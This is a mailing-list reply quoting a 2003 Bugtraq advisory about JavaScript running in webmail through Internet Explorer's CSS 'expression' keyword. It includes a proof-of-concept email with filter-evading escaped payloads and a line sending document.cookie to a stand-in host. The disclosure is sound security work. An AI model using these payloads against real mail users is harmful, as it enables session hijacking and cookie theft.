Yahoo has a massive userbase (with good reason). This kind of bug could potentially turn some IE security issues into a more readily mail borne attack. This could be bad. Very bad. I do not see that you have contacted Yahoo on this. > -----Original Message----- > From: Jedi/Sector One [mailto:j@pureftpd.org] > Sent: Thursday, October 02, 2003 2:39 PM > To: bugtraq@securityfocus.com > Subject: Webmails + Internet Explorer can create unwanted > javascript execution > > > > > Summary : Multiple web-based mail systems browsed through > Internet Explorer > can allow arbitrary javascript execution. > Date : 02/10/2003 > Author : Frank Denis <j@pureftpd.org> > > > ------------------------[ Description ]------------------------ > > The issue described here doesn't reveal a vulnerability in > a specific product. But the combination of features of > Internet Explorer with features of common webmail software > can create a vulnerability. > > 1) Internet Explorer interprets stylesheets for any HTML tag, > even non-existent ones. For instance : > > <xbody style="..."> > > is not a valid tag, but attributes are evaluated. > > It may be considered as a bug or as a logical behavior, > your mileage may vary. And this alone is not a security flaw. > > 2) Internet Explorer can evaluate Javascript expressions in > style sheets through the "expression" keyword : > > <style type="text/css"> > a { > width: expression(6 * 9 + 'px'); > } > </style> > > This is not a bug either, but a proprietary, properly > documented extension. > > 3) Due to the increase of HTML-only email, most popular > webmail software can display HTML email. In this context, > Javascript _must_ be removed from every email. To achieve > this result, various tricks are used by webmail software : > > - Removal or mangling of <script> tags, > > - Removal or mangling of "javascript:" urls. > > - Removal or mangling of properties like "onmouseover". > > > ------------------------[ Vulnerability > ]------------------------ > > By combining 2) with 3) and if the webmail doesn't filter > out stylesheets nor the "expression" keyword, any Javascript > contained in a message will be executed as soon as the > recipient will display it. > > Some webmail software are aware of that issue for a while > and they are mangling or filtering any occurrence of > "expression". However, the mangling may not work when the > name of the property is escaped (like "e\xpression") as CSS > permits. Or it may not work in the context of > non-existent-because- mangled tags. The former worked on > Yahoo! until yesterday (the issue was fixed quickly after > being reported, they are nice and reactive guys). > > But most software simply don't know about "expression". > They are _not_ faulty, though. This is not a bug nor a > vulnerability. "expression" is a proprietary extension. > Webmails don't have to know about every possible implication > of every proprietary extension of every version of every > browser out there. > > However, when the following conditions are met, the > Javascript is executed : > > - "expression" keywords aren't filtered/mangled by the > webmail software. > > - The client software is Internet Explorer. > > - Javascript isn't disabled in the client software. > Unfortunately, a lot of public webmail systems simply don't > work when Javascript is disabled. > > > ------------------------[ Impact ]------------------------ > > Depending on the webmail software, complete control of the > client's session may be possible. Private mail can be deleted > or bounced to evil addresses, cookies and session identifiers > can be stolen, etc. > > > ------------------------[ Proof of concept > ]------------------------ > > Webmail software like to filter or mangle stylesheets. Some > software totally remove everything inside <head>...</head> > tags. Some software totally remove <body>...</body> tags > (possibly killing style info by the way) instead of > converting them to something like <div>...</div>. Some > software totally remove <style>...</style> definitions but > accept inline css. > This is bad, because it encourages people to send broken > HTML 3 code instead of well-formed, accessible XHTML documents. > The following HTML email tries to add workarounds for this > kind of filters in order to test whether the "expression" > keyword that properly gets evaluated on Internet Explorer. It > currently works at least with IE 6 + Squirrelmail, Yahoo! and > the software of a dozen public and ISP webmail services I > have an account on. > > <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" > "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd";> > <html xmlns="http://www.w3.org/1999/xhtml"; xml:lang="fr"> <head> > <title>Webmail test</title> > <meta http-equiv="Content-Type" > content="text/html;charset=ISO-8859-1" /> </head> <body > style="width:expres\sion(alert(1))"> > <style type="text/css"> > h1 { > he\ight:e\xpression(alert(2)); > > bac\kground-image:e\xpression('url(http://example.org/'+d > ocument.cookie+$ > } > </style> > <h1 style="width:expression(alert(3))">...</h1> > <div id="just-for-fun"> > <a href="javascript:window.open(document.location);" > onmouseover="alert(4)">fireworks</a> > </div> > </body> > </html> > > > ------------------------[ Fix ]------------------------ > > For the end user, there are four ways to avoid this issue : > > - Don't use Internet Explorer to connect to webmails. > or/and > - Disable Javascript. > or/and > - Configure the webmail to only display mails as plain text. or/and > - Only connect to webmails when you are 100% sure the > software it is powered by completely filters or mangles > "expression" keywords and hope that software and the version > won't change silently. > > > -- > __ /*- Frank DENIS (Jedi/Sector One) > <j@42-Networks.Com> -*\ __ > \ '/ <a href="http://www.PureFTPd.Org/";> Secure FTP > Server </a> \' / > \/ <a href="http://www.Jedi.Claranet.Fr/";> Misc. free > software </a> \/ >
